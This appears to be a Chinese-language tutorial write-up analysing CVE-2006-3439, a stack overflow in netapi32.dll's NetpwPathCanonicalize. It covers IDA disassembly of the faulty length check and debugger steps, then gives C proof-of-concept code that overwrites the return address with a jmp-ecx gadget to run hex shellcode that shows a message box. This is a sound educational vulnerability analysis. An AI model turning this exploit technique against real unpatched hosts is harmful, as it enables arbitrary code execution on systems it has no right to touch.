作者：黑蛋

本次漏洞分析實(shí)例是編號(hào)CVE-2006-3439，他是系統(tǒng)庫NETAPI32.DLL中NetpwPathCanonicalize函數(shù)中出現(xiàn)的一個(gè)棧溢出漏洞，此函數(shù)主要對(duì)倆個(gè)字符串進(jìn)行拼接，漏洞主要成因是函數(shù)內(nèi)部對(duì)參數(shù)進(jìn)行邊界檢查是使用了wcslen，而開辟棧的時(shí)候是按照ASCLL開辟，也就是我們可以傳入雙倍字節(jié)的參數(shù)，造成溢出，下面對(duì)此dll中漏洞函數(shù)進(jìn)行分析：第一步，把dll拖入x86IDA中，等加載完成，在函數(shù)窗口搜索函數(shù)NetpwPathCanonicalize：

第二步，找到具體觸發(fā)漏洞函數(shù)（逐步跟進(jìn)，看哪里觸發(fā)異常）：

第三步，進(jìn)入這個(gè)call：

第四步，分析函數(shù)，我們假定傳入倆個(gè)字符串參數(shù)分別為（path，prefix)：

; int __stdcall sub_7517FC68(wchar_t *Str, wchar_t *Source, wchar_t *, int, int)
.text:7517FC68 sub_7517FC68 proc near?????????????? ; CODE XREF: NetpwPathCanonicalize+74↑p
.text:7517FC68
.text:7517FC68 var_416???????? = word ptr -416h
.text:7517FC68 Dest??????????? = word ptr -414h
.text:7517FC68 Str???????????? = dword ptr? 8
.text:7517FC68 Source????????? = dword ptr? 0Ch
.text:7517FC68 arg_8?????????? = dword ptr? 10h
.text:7517FC68 arg_C?????????? = dword ptr? 14h
.text:7517FC68 arg_10????????? = dword ptr? 18h
.text:7517FC68
.text:7517FC68???????????????? push??? ebp
.text:7517FC69???????????????? mov???? ebp, esp
.text:7517FC6B???????????????? sub???? esp, 414h?????? ;?開辟棧，0x414
.text:7517FC71???????????????? push??? ebx
.text:7517FC72???????????????? push??? esi
.text:7517FC73???????????????? xor???? esi, esi
.text:7517FC75???????????????? push??? edi
.text:7517FC76???????????????? cmp???? [ebp+Str], esi
.text:7517FC79??????? ?????????mov????edi, ds:__imp_wcslen
.text:7517FC7F???????????????? mov???? ebx, 411h?????? ;?邊界檢查
.text:7517FC84???????????????? jz????? short loc_7517FCED
.text:7517FC86???????????????? push??? [ebp+Str]?????? ; prefix字符串
.text:7517FC89???????????????? call??? edi ; __imp_wcslen
.text:7517FC8B???????????????? mov???? esi, eax??????? ; prefix字符串的長(zhǎng)度（unicode）
.text:7517FC8D???????????????? pop???? ecx
.text:7517FC8E???????????????? test??? esi, esi
.text:7517FC90???????????????? jz????? short loc_7517FCF4
.text:7517FC92???????????????? cmp???? esi, ebx
.text:7517FC94???????????????? ja????? loc_7517FD3E
.text:7517FC9A???????????????? push??? [ebp+Str]?????? ; Source
.text:7517FC9D???????????????? lea???? eax, [ebp+Dest]
.text:7517FCA3???????????????? push?? ?eax????????????; Dest
.text:7517FCA4???????????????? call??? ds:__imp_wcscpy
.text:7517FCAA???????????????? mov???? ax, [ebp+esi*2+var_416]
.text:7517FCB2???????????????? pop???? ecx
.text:7517FCB3???????????????? cmp???? ax, 5Ch
.text:7517FCB7????????? ???????pop????ecx
.text:7517FCB8???????????????? jz????? short loc_7517FCD5
.text:7517FCBA???????????????? cmp???? ax, 2Fh
.text:7517FCBE???????????????? jz????? short loc_7517FCD5
.text:7517FCC0???????????????? lea???? eax, [ebp+Dest]
.text:7517FCC6???????????????? push??? offset asc_751717B8 ; "\\"
.text:7517FCCB???????????????? push??? eax???????????? ; Dest
.text:7517FCCC???????????????? call??? ds:__imp_wcscat
.text:7517FCD2???????????????? pop???? ecx
.text:7517FCD3??????????????? ?inc????esi
.text:7517FCD4???????????????? pop???? ecx
.text:7517FCD5
.text:7517FCD5 loc_7517FCD5:?????????????????????????? ; CODE XREF: sub_7517FC68+50↑j
.text:7517FCD5???????????????????????????????????????? ; sub_7517FC68+56↑j
.text:7517FCD5????????? ???????mov????eax, [ebp+Source]
.text:7517FCD8???????????????? mov???? ax, [eax]
.text:7517FCDB???????????????? cmp???? ax, 5Ch
.text:7517FCDF???????????????? jz????? short loc_7517FCE7
.text:7517FCE1???????????????? cmp???? ax, 2Fh
.text:7517FCE5??????? ?????????jnz????short loc_7517FCF4
.text:7517FCE7
.text:7517FCE7 loc_7517FCE7:?????????????????????????? ; CODE XREF: sub_7517FC68+77↑j
.text:7517FCE7???????????????? add???? [ebp+Source], 2
.text:7517FCEB???????????????? jmp???? short loc_7517FCF4
.text:7517FCED ; ---------------------------------------------------------------------------
.text:7517FCED
.text:7517FCED loc_7517FCED:?????????????????????????? ; CODE XREF: sub_7517FC68+1C↑j
.text:7517FCED???????????????? mov???? [ebp+Dest], si
.text:7517FCF4
.text:7517FCF4 loc_7517FCF4:?????????????????????????? ; CODE XREF: sub_7517FC68+28↑j
.text:7517FCF4???????????????????????????????????????? ; sub_7517FC68+7D↑j ...
.text:7517FCF4???????????????? push??? [ebp+Source]??? ; path字符串
.text:7517FCF7?????????? ??????call???edi ; __imp_wcslen
.text:7517FCF9???????????????? add???? eax, esi??????? ; path+\+prefix的長(zhǎng)度
.text:7517FCFB???????????????? pop???? ecx
.text:7517FCFC???????????????? cmp???? eax, ebx??????? ;?第二次邊界檢查，ebx=0x411，倆次拼接但是這里指的是UNICODE的長(zhǎng)度，也就是說我們?cè)谶@里可以傳入0x822字節(jié)東西
.text:7517FCFE???????????????? ja????? short loc_7517FD3E
.text:7517FD00???????????????? push??? [ebp+Source]??? ; Source
.text:7517FD03???????????????? lea???? eax, [ebp+Dest]
.text:7517FD09???????????????? push??? eax???????????? ; Dest
.text:7517FD0A???????????????? call??? ds:__imp_wcscat
.text:7517FD10???????????????? pop???? ecx
.text:7517FD11???????????????? lea???? eax, [ebp+Dest]
.text:7517FD17???????????????? pop???? ecx
.text:7517FD18???????????????? push??? eax
.text:7517FD19????? ???????????call??? sub_7518AE95
.text:7517FD1E???????????????? lea???? eax, [ebp+Dest]
.text:7517FD24???????????????? push??? eax???????????? ; Name
.text:7517FD25???????????????? call??? sub_7518AEB3
.text:7517FD2A???????????????? test??? eax, eax
.text:7517FD2C???????????????? jnz???? short loc_7517FD43
.text:7517FD2E???????????????? lea???? eax, [ebp+Dest]

第五步，我們得到結(jié)論可以傳入0x822字節(jié)，但是棧中buffer只要0x411字節(jié)，意味著無論是path參數(shù)還是prefix參數(shù)，我們都可以傳入雙倍內(nèi)容，隨后發(fā)現(xiàn)在漏洞函數(shù)之前，有一個(gè)函數(shù)已經(jīng)對(duì)prefix參數(shù)進(jìn)行了長(zhǎng)度檢查，所以我們只能利用path參數(shù)：

二、環(huán)境配置

環(huán)境

配置

系統(tǒng)

WinXP

編譯器

VC6++

調(diào)試器

x86IDA，x86DBG

項(xiàng)目配置

win32+realse

文件

netapi32.dll

dll文件

三、漏洞分析

測(cè)試代碼如下：我直接加載沒打補(bǔ)丁的dll，我們主要是通過loadlibrary函數(shù)加載我們的dll，然后通過GetProcAddress函數(shù)獲得NetpwPathCanonicalize函數(shù)地址，通過函數(shù)指針調(diào)用，傳入倆個(gè)參數(shù)，一個(gè)全部覆蓋為61，一個(gè)全部覆蓋為62，結(jié)尾都是以00結(jié)尾，觀察是哪里造成溢出：

#include
typedef void (*MYPROC)(LPTSTR);
int main()
{
??? char path[0x320];
??? char can_path[0x440];
??? int maxbuf=0x440;
??? char prefix[0x100];
??? long pathtype=44;
??? //load vulnerability netapi32.dll which we got from a WIN2K sp4 host?
??? HINSTANCE LibHandle;
??? MYPROC Trigger;
??? char dll[ ] = "./netapi32.dll"; // care for the path
??? char VulFunc[ ] = "NetpwPathCanonicalize";
??? LibHandle = LoadLibrary(dll);
??? Trigger = (MYPROC) GetProcAddress(LibHandle, VulFunc);
??? memset(path,0,sizeof(path));
??? memset(path,'a',sizeof(path)-2);
??? memset(prefix,0,sizeof(prefix));
??? memset(prefix,'b',sizeof(prefix)-2);
??? (Trigger)(path,can_path,maxbuf,prefix ,&pathtype,0);
??? FreeLibrary(LibHandle);
}

生成realse，拖入x86dbg，F(xiàn)9進(jìn)入程序領(lǐng)空：

找到主函數(shù)入口：

進(jìn)入主函數(shù)，找到我們函數(shù)指針調(diào)用的NetpwPathCanonicalize函數(shù)處：

運(yùn)行到call edx處，查看edx的值，跳轉(zhuǎn)到NetpwPathCanonicalize頭部下斷點(diǎn)：

運(yùn)行到漏洞函數(shù)，再找到具體拷貝字符串函數(shù)，下斷點(diǎn)：

進(jìn)入目標(biāo)函數(shù)：

F4運(yùn)行到第二個(gè)wcscat函數(shù)后：

觀察堆棧：
esp處：

發(fā)現(xiàn)我們棧中buffer首地址是12F294；
ebp處：

我們發(fā)現(xiàn)path字符串倒數(shù)第4-第8字節(jié)淹沒返回值；運(yùn)行到函數(shù)尾部：

我們發(fā)現(xiàn)ecx的值正好指向我們buffer首地址，所以我們只需要在淹沒返回值那里找到一個(gè)jmp ecx或者call ecx的指令，在netapi32.dll中我找到一條指令751852F9：

把此地址構(gòu)造在淹沒返回值的地方，程序流程就可以跳轉(zhuǎn)到我們buffer中去，接下來構(gòu)造shellcode，下面是新代碼，我們吧path參數(shù)倒數(shù)4-8位置寫成我們的跳轉(zhuǎn)指令，即751852F9，再給prefix拷貝我們彈窗shellcode，作用是彈一個(gè)MessageBox的框，供我們觀察：

#include
typedef void (*MYPROC)(LPTSTR);
char shellcode2[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
?????? "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
?????? "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
?????? "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
?????? "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
?????? "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
?????? "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
?????? "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
?????? "\x53\x68\x6F\x70\x20\x20\x68\x76\x75\x6C\x74\x8B\xC4\x53\x50\x50"
?????? "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90";
int main()
{??
??? char path[0x320];
??? char can_path[0x440];
??? int maxbuf=0x440;
??? char prefix[0x100];
??? long pathtype=44;
??? //load vulnerability netapi32.dll which we got from a WIN2K sp4 host?
??? HINSTANCE LibHandle;
??? MYPROC Trigger;
??? char dll[ ] = "./netapi32.dll"; // care for the path
??? char VulFunc[ ] = "NetpwPathCanonicalize";
??? LibHandle = LoadLibrary(dll);
??? Trigger = (MYPROC) GetProcAddress(LibHandle, VulFunc);
??? memset(path,0,sizeof(path));
??? memset(path,0x90,sizeof(path)-2);
??? memset(prefix,0,sizeof(prefix));
??? memset(prefix,0x90,sizeof(prefix)-2);
??? memcpy(prefix,shellcode2,176);
??? //0x751852F9
??? path[0x318] = 0xF9;
??? path[0x319] = 0x52;
??? path[0x31A] = 0x18;
??? path[0x31B] = 0x75;
??? //__asm int 3
??? (Trigger)(path,can_path,maxbuf,prefix ,&pathtype,0);
??? FreeLibrary(LibHandle);
}

觀察運(yùn)行結(jié)果，彈窗成功：

接下來我們繼續(xù)吧程序拖入x86dbg中，按照前面流程到觸發(fā)漏洞函數(shù)處：

F7進(jìn)入，并運(yùn)行到函數(shù)尾部：

觀察堆棧情況：棧內(nèi)buffer：

返回值處：

一切如我們所料，繼續(xù)運(yùn)行，到了我們的shellcode處：

F9運(yùn)行，彈框